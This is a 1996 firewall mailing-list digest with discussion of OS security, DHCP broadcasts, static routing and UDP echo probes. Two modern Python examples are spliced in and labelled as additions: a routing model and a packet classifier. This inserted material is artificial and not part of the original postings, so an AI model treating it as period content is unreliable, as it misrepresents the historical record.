> -a few harmless services such as inetd
> -the firewall software, often known, sometimes proven to be good
> i trust this stuff, but not the configuration of the firewall, even not mine.
> if you want a better security as such one, it's surely *not* your OS, it's
> simply not to connect at all.
> i don't know if your OS is more or less secure as mine. but, IMHO, it doesn't
> matter. human failure, that's the point you have to take care.
>
> rolf

It does matter. And so does limiting the effects of human failure, which
will always be present. When you make a human SUPER user, you have
amplified that user's mistakes. So here is one path to travel to limit
human mistakes. But this is not the place for a tutorial on how to deal
with the REAL risks of a computing environment. Suffice it to say that if
you don't deal with them, your firewall won't work, your home page will
be violated, and termites will eat your mouse pad.

That is why I reassert that if your base OS (including the admin
environment) is not high assurance and does not deal with the real
threats, your firewall is not very good.
Jon

From firewalls-owner Wed Feb 7 16:53:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA12762 for firewalls-outgoing; Wed, 7 Feb 1996 16:47:24 -0800 (PST)
Received: from alpha2000.tech-comm.com (ns.tech-comm.com [204.251.171.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA12755 for ; Wed, 7 Feb 1996 16:47:20 -0800 (PST)
Received: by alpha2000.tech-comm.com; (5.65/1.1.8.2/05Jun95-1217PM) id AA30663; Wed, 7 Feb 1996 18:46:42 -0600
Date: Wed, 7 Feb 1996 18:46:42 -0600
From: Dick Brooks
Message-Id: <9602080046.AA30663@alpha2000.tech-comm.com>
To: Firewalls@GreatCircle.COM, pcuser@slip67-241.ny.us.ibm.net
Subject: Re: Firewalls Product Comparison
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You can find out about IBM's Secure Network Gateway at:

http://www.raleigh.ibm.com/sng/sngover.html

We used IBM's firewall at one of our customers. It seems to be a high
quality product at a reasonable price ($9,999)

Dick Brooks                     dick@tech-comm.com
Chief Technical Officer         Tel. 205-250-8054
TECH-COMM Inc.                  WWW URL: http://www.tech-comm.com/
THE ONLY COMPANY OFFERING VISA CERTIFIED INTERNET CREDIT CARD PROCESSING SW

From firewalls-owner Wed Feb 7 17:56:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13148 for firewalls-outgoing; Wed, 7 Feb 1996 16:52:34 -0800 (PST)
Received: from taz.nda.com ([206.0.206.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA13116 for ; Wed, 7 Feb 1996 16:52:24 -0800 (PST)
Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id QAA14547; Wed, 7 Feb 1996 16:52:27 -0800 (PST)
From: David Kovar
Message-Id: <199602080052.QAA14547@taz.nda.com>
Subject: Re: fw-1 and smapd
To: nlehrer@usia.gov (Lehrer Neil)
Date: Wed, 7 Feb 1996 16:52:26 -0800 (PST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <2C1D19310136C8D1@usia.gov> from "Lehrer, Neil" at Feb 7, 96 05:44:07 pm
X-Mailer: EL

From firewalls-owner Thu Feb 8 02:39:10 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA13430 for firewalls-outgoing; Thu, 8 Feb 1996 02:36:04 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA13425 for ; Thu, 8 Feb 1996 02:36:00 -0800 (PST)
Message-Id: <199602081036.CAA13425@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA266594928; Thu, 8 Feb 1996 21:22:08 +1100
From: Darren Reed
Subject: Re: 0.0.0.0 address on LAN
To: gaus@znanost.hr (Damir Rajnovic)
Date: Thu, 8 Feb 1996 21:22:08 +1100 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199602080918.KAA17830@hvar.mzt.hr> from "Damir Rajnovic" at Feb 8, 96 10:18:27 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Damir Rajnovic, sie said:
>
> Hello,
>
> Someone ask who produce 0.0.0.0 ip address, answer is Win95 (and NT
> maybe - don't have it around so can't be sure).
> Here is excerpt:
>
> Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast)
> OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6
> Hops: 0, XID: 0000AF37, trying since 1024 second(s)
>
> and that guy have Win95 on his machine.

Looks like DHCP trying to work. Check the configuration of the Win95
machine for the DHCP setup.

darren

From firewalls-owner Thu Feb 8 03:24:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA14974 for firewalls-outgoing; Thu, 8 Feb 1996 03:06:09 -0800 (PST)
Received: from cleese.apana.org.au (dotat-gw.apana.org.au [203.14.159.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA14946 for ; Thu, 8 Feb 1996 03:05:41 -0800 (PST)
Received: (from newton@localhost) by cleese.apana.org.au (8.7.1/8.7) id VAA06734 for firewalls@greatcircle.com; Thu, 8 Feb 1996 21:40:07 +1030 (CST)
Date: Thu, 8 Feb 1996 21:40:07 +1030 (CST)
From: Mark Newton
Message-Id: <199602081110.VAA06734@cleese.apana.org.au>
To: firewalls@greatcircle.com
Subject: The "ULTIMATELY secure firewall" web page
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have a need to point out some network security problems to an
acquaintance, and thought it'd be effective if I illustrated some of them
by pointing him at "The ULTIMATELY secure firewall" page on
http://www.iwi.com/pubs/A1firewall.htm.

Unfortunately, it seems to have disappeared :-(

Can anyone offer me a pointer to the page?

Thanks in advance,

- mark

--------------------------------------------------------------------
I tried an internal modem,                  newton@cleese.apana.org.au
    but it hurt when I walked.                        Mark Newton
----- Voice: +61-8-3732429 ------------- Data: +61-8-3736006 -----

From firewalls-owner Thu Feb 8 03:38:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA16054 for firewalls-outgoing; Thu, 8 Feb 1996 03:23:55 -0800 (PST)
Received: from amcada.amc.uva.nl (amcada.amc.uva.nl [145.18.204.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA16041 for ; Thu, 8 Feb 1996 03:23:41 -0800 (PST)
From: F.Wetzels@amc.uva.nl
Received: from eland.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01I0YY4KV9JK8WWF6C@amc.uva.nl>; Thu, 8 Feb 1996 12:22:03 +1
Received: from amchelix.amc.uva.nl by eland.amc.uva.nl (5.x/SMI-5.0) id AA27114; Thu, 8 Feb 1996 12:21:57 +0100
Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA00997; Thu, 8 Feb 1996 12:21:48 +0100
Date: Thu, 08 Feb 1996 12:21:48 +0100
Subject: Re: routing table go through firewall ?
To: firewalls@greatcircle.com
Message-id: <9602081121.AA00997@amchelix.amc.uva.nl>
X-Envelope-to: firewalls@greatcircle.com
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7bit
Content-MD5: 15UJU/sKpFbCd3Wir2vc5w==
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

fpmw> I am testing our fw-1 and have got a question before
fpmw> implementing our security.
fpmw> I will use dual homed g/w with fw-1 and connect each ends to the internet
fpmw> and our internal network.
fpmw>
fpmw> Our net -- Router ----- F/W ---- Router -- Internet
fpmw>                                    |
fpmw>                                 BBS Server
fpmw> ...
fpmw> The question is that each router can exchange each routing table or not ?
fpmw> If can , How it's possible. ?

It can. It depends on what you want. You turn `rip services' on and off.
But it's also possible to do this for igrp, bgp and egp.

fpmw> Our network person assumes the G/W with F/W must use rip protocol.
fpmw> In our case he won't recommend the rip protocol due to it's heavy traffic.

I doubt rip producing much traffic.
Normally rip tables are spread once in 30 seconds.

fpmw> If it is not possible , please explain in detail how to reach to the
fpmw> BBS server from the Our net.

In case you're *not* using rip or other routing protocol, you should add
static routes on your F/W and internal router. I assumed some IP addresses
on the routers and your BBS station:

Your net -------- Router ------------ FW -------+------- Router ------ internet
         aaa.1          bbb.2    bbb.1    ccc.2 |  ccc.1        ddd.2
                                                |
                                                | ccc.3
                                               BBS

On FW:
    default  via ccc.1
    your net via bbb.2
On Router:
    default  via bbb.1

You don't need (mustn't) to define a routing rule for directly connected
subnets.

fpmw> If it must use static routing, how to reach internet just with name from our
fpmw> net. Our internal DNS server maintains internal names only and Our policy
fpmw> is to let Our net users go out without restriction and Internet users
fpmw> be prohibited in some extents.

`Internet' should be able to locate the name of your net. A nice solution
is an external dns and an internal dns. The FW and the two DNS's should be
configured that they communicate (forwarding). But internet sees only two
or three machines (the DNS + BBS? + FW(ccc.2)?) The FW should be
configured such that only DNS request from your external DNS are allowed
and vice versa. In this way DNS information is available but your net
remains invisible (you can allow ping and deny telnet and so on)

Frank

-------------------------------------------------
F.P.M. Wetzels                ADIV/CNS D01-319.1
f.wetzels@amc.uva.nl          meibergdreef 15
Voice +31 20 5662916          1105 AZ Amsterdam-ZO
Fax   +31 20 6973181
-------------------------------------------------

From firewalls-owner Thu Feb 8 03:54:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15153 for firewalls-outgoing; Thu, 8 Feb 1996 03:08:31 -0800 (PST)
Received: from iez.com (mail.iez.com [194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA15142 for ; Thu, 8 Feb 1996 03:08:14 -0800 (PST)
Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA09429; Thu, 8 Feb 1996 12:08:02 +0100
Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma009425; Thu Feb 8 12:07:56 1996
Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA12965; Thu, 8 Feb 1996 12:05:50 +0100
Message-Id: <9602081105.AA12965@spibm02>
Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA29495; Thu, 8 Feb 96 12:05:48 +0100
Received: by inhps-a (1.38.193.3/16.2) id AA07866; Thu, 8 Feb 96 12:05:46 +0100
From: Rolf Weber
Subject: Re: Most Secure Unix?
To: spencerj@dg-rtp.dg.com (Jon Spencer)
Date: Thu, 8 Feb 1996 12:05:46 +0100 (MEZ)
Cc: firewalls@greatcircle.com (firewalls)
In-Reply-To: <9602072343.AA05372@tsgops.rtp.dg.com> from "Jon Spencer" at Feb 7, 96 06:43:21 pm
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> I think perhaps my point wasn't made clearly. The firewall can only be as
> good as the OS on which it exists. If your firewall is an application
> on top of an OS, I can break the firewall by breaking the OS.
>
i never heard of any breakin possible because of a kernel bug. may be i'm
wrong, may be it's possible, but i cannot imagine.

>
> Well, "impossible" is a very big word to use! Especially, since this is
> exactly what we have.
> If your assumption is that the firewall is an
> application, then I do agree with you. That is why the functions of a
> firewall need to be a base component of a high assurance OS (so you know
> that they work). Then you run the WWW server on that OS, and you (apparently)
> have the impossible. :-)
>
i don't trust *no* WWW server on *no* OS.

>
> It does matter. And so does limiting the effects of human failure, which will
> always be present. When you make a human SUPER user, you have amplified
> that users mistakes. So here is one path to travel to limit human mistakes.
> But this is not the place for a tutorial on how to deal with the REAL risks
> of a computing environment. Suffice it to say that if you don't deal with
> them, your firewall won't work, your home page will be violated, and
> termites will eat your mouse pad.
>
> That is why I reassert that if your base OS (including the admin environment)
> is not high assurance and does not deal with the real threats, your
> firewall is not very good.
>
i fear this will go to an endless discussion...

IMHO, it's senseless to discuss which OS is secure and which not. how will
you prove it? my company is a softwarehouse, and we are using a lot of
different UNIXes. a few years ago, we got a new OS which was announced to
be a C2 system. /etc/passwd was owned by 'bin'! every host which appeared
in /etc/hosts.equiv could modify it. i had a really great ROTFL and
stopped even thinking about security classifications.

i know about my configuration, i know how far i can trust it and where the
(possible) vulnerabilities are. that's the most important.

may be a ''high security UNIX`` is useful on a multiuser system. on a
firewall, where root should be the only user, it doesn't hurt, that's all.

rolf
--
-----------------------------------------
Rolf Weber              | All I ask is a chance
IEZ AG D-64625 Bensheim | to prove that money
++49-6251-1309-113      | can't make me happy.
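Going back to Frank Wetzels' static-routing answer earlier in this digest (the "On FW: default via ccc.1, your net via bbb.2; On Router: default via bbb.1" recipe), here is an added worked example that is not code from any poster: a small longest-prefix-match forwarding model of that dual-homed topology. The aaa/bbb/ccc/ddd prefixes are replaced with constructed documentation addresses, and the routes on the BBS host, the external router and the upstream are my assumptions, since the posting only specifies the FW and the internal router. It shows that the FW reaches the BBS on ccc.3 with no static route at all (the subnet is directly connected, as Frank says), and what goes wrong when the "your net via bbb.2" entry is left off the FW: return traffic follows the FW's default route back out and bounces between the FW and the external router.

```python
"""Static-route walk-through for the dual-homed firewall topology.

Added example (not code from the original posting). The prefixes below are
constructed stand-ins for the aaa/bbb/ccc/ddd placeholders; the routes on the
external router, the BBS host and the upstream are assumptions.
"""
import ipaddress
from dataclasses import dataclass, field

AAA = ipaddress.ip_network("198.51.100.0/24")  # "Your net" (assumed routable)
BBB = ipaddress.ip_network("10.0.0.0/30")       # internal Router <-> FW link
CCC = ipaddress.ip_network("192.0.2.0/24")      # FW / BBS / external Router segment
DDD = ipaddress.ip_network("203.0.113.0/30")    # external Router <-> upstream link
EXT = ipaddress.ip_network("100.100.100.0/24")  # constructed stand-in for a remote net
DEFAULT = ipaddress.ip_network("0.0.0.0/0")


def ip(net, host):
    """aaa.1 -> ip(AAA, 1): the host-th address inside net."""
    return net.network_address + host


@dataclass
class Node:
    name: str
    connected: dict                              # interface address -> on-link prefix
    static: list = field(default_factory=list)   # (prefix, next hop) pairs

    def lookup(self, dst):
        """Longest-prefix match. Returns the next hop, dst itself when the
        destination is on a directly connected subnet, or None for no route."""
        best = None
        for net in self.connected.values():      # connected routes come for free
            if dst in net and (best is None or net.prefixlen > best[0]):
                best = (net.prefixlen, dst)
        for net, nh in self.static:              # explicitly configured routes
            if dst in net and (best is None or net.prefixlen > best[0]):
                best = (net.prefixlen, nh)
        return None if best is None else best[1]


def build(fw_knows_inside_net=True):
    """The topology from the posting; the flag drops 'your net via bbb.2' on the FW."""
    inside = Node("inside-host", {ip(AAA, 50): AAA}, [(DEFAULT, ip(AAA, 1))])
    router = Node("Router", {ip(AAA, 1): AAA, ip(BBB, 2): BBB},
                  [(DEFAULT, ip(BBB, 1))])                    # On Router: default via bbb.1
    fw = Node("FW", {ip(BBB, 1): BBB, ip(CCC, 2): CCC},
              [(DEFAULT, ip(CCC, 1))])                        # On FW: default via ccc.1
    if fw_knows_inside_net:
        fw.static.append((AAA, ip(BBB, 2)))                   # On FW: your net via bbb.2
    bbs = Node("BBS", {ip(CCC, 3): CCC},
               [(DEFAULT, ip(CCC, 1)), (AAA, ip(CCC, 2))])    # assumption
    ext = Node("ExtRouter", {ip(CCC, 1): CCC, ip(DDD, 2): DDD},
               [(DEFAULT, ip(DDD, 1)), (AAA, ip(CCC, 2))])    # assumption: your net via the FW
    upstream = Node("Internet", {ip(DDD, 1): DDD, ip(EXT, 1): EXT},
                    [(AAA, ip(DDD, 2))])                      # assumption: upstream routes your net to you
    remote = Node("remote-host", {ip(EXT, 9): EXT}, [(DEFAULT, ip(EXT, 1))])
    return {n.name: n for n in (inside, router, fw, bbs, ext, upstream, remote)}


def trace(nodes, start, dst, max_hops=16):
    """Forward a packet hop by hop; returns (path, status)."""
    dst = ipaddress.ip_address(dst)
    owner = {a: n.name for n in nodes.values() for a in n.connected}
    path, cur = [start], nodes[start]
    for _ in range(max_hops):
        if dst in cur.connected:             # this node owns the destination address
            return path, "delivered"
        nh = cur.lookup(dst)
        nxt = owner.get(nh) if nh is not None else None
        if nxt is None:
            return path, "unreachable"
        if nxt in path:                      # same box seen twice: routing loop
            return path, "loop"
        path.append(nxt)
        cur = nodes[nxt]
    return path, "ttl-exceeded"


if __name__ == "__main__":
    good = build()
    print(trace(good, "inside-host", str(ip(EXT, 9))))
    print(trace(good, "remote-host", str(ip(AAA, 50))))
    print(trace(good, "FW", str(ip(CCC, 3))))      # connected subnet: no static route needed
    print(trace(build(fw_knows_inside_net=False), "remote-host", str(ip(AAA, 50))))
```

The model deliberately has no routing protocol at all: every entry is either a connected subnet or a static route, which is exactly the "not using rip" case the answer covers. The loop in the last trace is the practical reason the FW must carry a route for the inside network even though it has a default route: a default route only tells it where the rest of the world is.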
From firewalls-owner Thu Feb 8 04:39:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19107 for firewalls-outgoing; Thu, 8 Feb 1996 04:25:01 -0800 (PST)
Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19094 for ; Thu, 8 Feb 1996 04:24:53 -0800 (PST)
Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19567; Thu, 8 Feb 1996 07:23:59 -0500
Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0290; Thu, 08 Feb 96 07:24:32 -0500
Message-Id: <9602081224.AA0290@notes.cbis.com>
Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 68D97D4CC72345E7852562CA0042B92C; Thu, 8 Feb 96 07:24:25
To: security , firewalls-digest
From: Warren Moore
Date: 8 Feb 96 7:15:10
Subject: Security Policies Made Easy
X-Importance: High
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My mailer thinks Bruno Mamer said:
>Just a small question, last August, "Jim Carroll" talked of the book
>"Information Security Policies Made Easy".
>
>We've decided to buy it but lack references. Does anyone have the editor,
>ISBN number ?

Not precisely, but this should do:

Author:    Charles Cresson Wood
Publisher: Baseline Software, Sausalito, CA
Tel:       415-332-7763
FAX:       415-332-8032

Warren S. Moore, CISSP
Information Security Specialist
Cincinnati Bell Information Systems Inc.
From firewalls-owner Thu Feb 8 04:54:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19316 for firewalls-outgoing; Thu, 8 Feb 1996 04:28:55 -0800 (PST)
Received: from ns.gbnet.net (ns.gbnet.net [194.70.126.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA19293 for ; Thu, 8 Feb 1996 04:28:44 -0800 (PST)
Received: (from jrg@localhost) by ns.gbnet.net (8.7.3/8.6.12) id MAA01584; Thu, 8 Feb 1996 12:26:33 GMT
Date: Thu, 8 Feb 1996 12:26:33 GMT
From: James R Grinter
Message-Id: <199602081226.MAA01584@ns.gbnet.net>
X-Subliminal: H is for Hypertext
X-Mailer: Mail User's Shell (7.2.5 10/14/92)
To: "Jason L. Haar"
Subject: Re: anybody know of any vulnerabilities with "echo"
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu 8 Feb, 1996, "Jason L. Haar" wrote:
>I wonder, this smells heavily of the "Harvest cache Web server".
>Harvest uses some pretty wild checks on upstream web sites to see if
>they're up or not - the default is to "ping" the host using UDP echo
>packets - that could be what you're seeing.
>
>Of course, it goes without saying that such sites shouldn't set up such
>things without ASKING those sites first...

The reason it can be configured to send those UDP packets (but *isn't* by
default) is to attempt to determine if it will be quicker to fetch the
file from source rather than going through its cache hierarchy.

If you don't want people to be able to retrieve things quickly from your
web server where possible...

James.
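Two messages in this digest are about the same question a firewall admin keeps asking, "what is this UDP datagram and do I need to care?": Darren Reed's BOOTREQUEST excerpt from a client at 0.0.0.0 broadcasting to 255.255.255.255, and the UDP echo (port 7) packets discussed in this thread. The following is an added example, not code from either poster: it parses a raw IPv4/UDP datagram, decodes the BOOTP fixed header fields the excerpt shows (op, hardware type and length, hops, XID, seconds), and labels each packet with a defender's verdict. The three sample packets are constructed in the script (the DHCP one carries the field values from Darren's excerpt), and the classifier and its action strings are my own; nothing here is the Harvest software's actual probe format.

```python
"""Classify stray UDP datagrams seen at a firewall: BOOTP/DHCP requests
from an unconfigured client (source 0.0.0.0) and UDP echo (port 7) probes.

Added example, not code from either posting. Packets are constructed below;
the BOOTREQUEST uses the field values from the excerpt in the thread.
"""
import struct
import ipaddress

UDP = 17
BOOTP_SERVER, BOOTP_CLIENT, ECHO = 67, 68, 7
BOOTREQUEST = 1
BOOTP_FIXED_LEN = 236        # RFC 951 fixed header, op through file, no vendor area
UNSPECIFIED = ipaddress.ip_address("0.0.0.0")
BROADCAST = ipaddress.ip_address("255.255.255.255")


def make_udp_packet(src, dst, sport, dport, payload):
    """Constructed IPv4+UDP frame (no IP options, checksums left at zero)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, UDP, 0,
                         ipaddress.ip_address(src).packed,
                         ipaddress.ip_address(dst).packed)
    return ip_hdr + udp


def make_bootp(op, htype, hlen, hops, xid, secs):
    """Constructed BOOTP message: the leading fields we care about, rest zeroed."""
    head = struct.pack("!BBBBIHH", op, htype, hlen, hops, xid, secs, 0)
    return head + bytes(BOOTP_FIXED_LEN - len(head))


def parse_udp(pkt):
    """Addresses, ports and payload of an IPv4/UDP packet, or None if it is not one."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4 or pkt[9] != UDP:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    sport, dport, ulen, _ = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    return {"src": ipaddress.ip_address(pkt[12:16]),
            "dst": ipaddress.ip_address(pkt[16:20]),
            "sport": sport, "dport": dport,
            "payload": pkt[ihl + 8:ihl + ulen]}


def classify(pkt):
    """Label a datagram and say what a perimeter filter should do with it."""
    u = parse_udp(pkt)
    if u is None:
        return {"kind": "not-udp", "action": "ignore"}
    ports = (u["sport"], u["dport"])
    if ports == (BOOTP_CLIENT, BOOTP_SERVER) and len(u["payload"]) >= BOOTP_FIXED_LEN:
        op, htype, hlen, hops, xid, secs = struct.unpack("!BBBBIH", u["payload"][:10])
        if op == BOOTREQUEST:
            return {"kind": "bootp-request",
                    # source 0.0.0.0 to the limited broadcast: a host with no address yet
                    "unconfigured_client": u["src"] == UNSPECIFIED and u["dst"] == BROADCAST,
                    "htype": htype, "hlen": hlen, "hops": hops,
                    "xid": f"{xid:08X}", "secs": secs,
                    "action": "LAN noise from a DHCP client; check that host's DHCP "
                              "setup, nothing for the firewall to pass"}
    if u["dport"] == ECHO:
        return {"kind": "udp-echo-probe", "src": str(u["src"]),
                "action": "drop at the perimeter and log the source; do not answer"}
    return {"kind": "other-udp", "src": str(u["src"]), "dport": u["dport"],
            "action": "apply normal policy"}


# Constructed samples: the BOOTREQUEST from the excerpt, an echo probe, a DNS query.
SAMPLES = {
    "win95-dhcp": make_udp_packet("0.0.0.0", "255.255.255.255", BOOTP_CLIENT, BOOTP_SERVER,
                                  make_bootp(BOOTREQUEST, 1, 6, 0, 0x0000AF37, 1024)),
    "echo-probe": make_udp_packet("192.0.2.10", "198.51.100.5", 40000, ECHO, b"ping"),
    "dns-query": make_udp_packet("198.51.100.7", "198.51.100.53", 1234, 53, bytes(12)),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, classify(pkt))
```

The point of decoding the BOOTP header rather than matching on 0.0.0.0 alone is that the fields confirm the diagnosis Darren gave from the excerpt (op 1, Ethernet hardware address of length 6, zero hops, and a `secs` counter that keeps climbing while no server answers); a source of 0.0.0.0 on anything other than a DHCP/BOOTP exchange is the case that deserves a closer look.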
From firewalls-owner Thu Feb 8 05:23:53 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20306 for firewalls-outgoing; Thu, 8 Feb 1996 04:45:50 -0800 (PST)
Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20280 for ; Thu, 8 Feb 1996 04:45:33 -0800 (PST)
Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19939; Thu, 8 Feb 1996 07:44:09 -0500
Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0382; Thu, 08 Feb 96 07:44:41 -0500
Message-Id: <9602081244.AA0382@notes.cbis.com>
Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 9BBFD18CE5F0EF95852562CA0043C751; Thu, 8 Feb 96 07:44:41
To: firewalls-digest
From: Warren Moore
Date: 8 Feb 96 7:42:42
Subject: I want details!!! Re: NT's TCP/IP stack
X-Importance: High
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 7 Feb 1996 13:23:28 -0600 (CST), my mailer thinks that Robert Dana said:
>One of the most valuable things about forums like this is the potential to
>share information that cuts through all the BS that floats around out there in
>the form of marketing materials and vendor-biased trade publications. I'm
>constantly disappointed about how little valuable knowledge is really posted.
>And please- keep your OS religion to yourself. Sure, UNIX is what I'm most
>comfortable with for now, but that doesn't change the fact that I have to deal
>with NT whether I want to or not. GIVE US FACTS.

One small voice of sanity...hooray!

Ladies & gents, the vast majority of you who post to this list give all
the appearances of really knowing your stuff...which is a great help to
those of us who are NOT networking geeks, but some other sort of geek
(IBM Mainframe/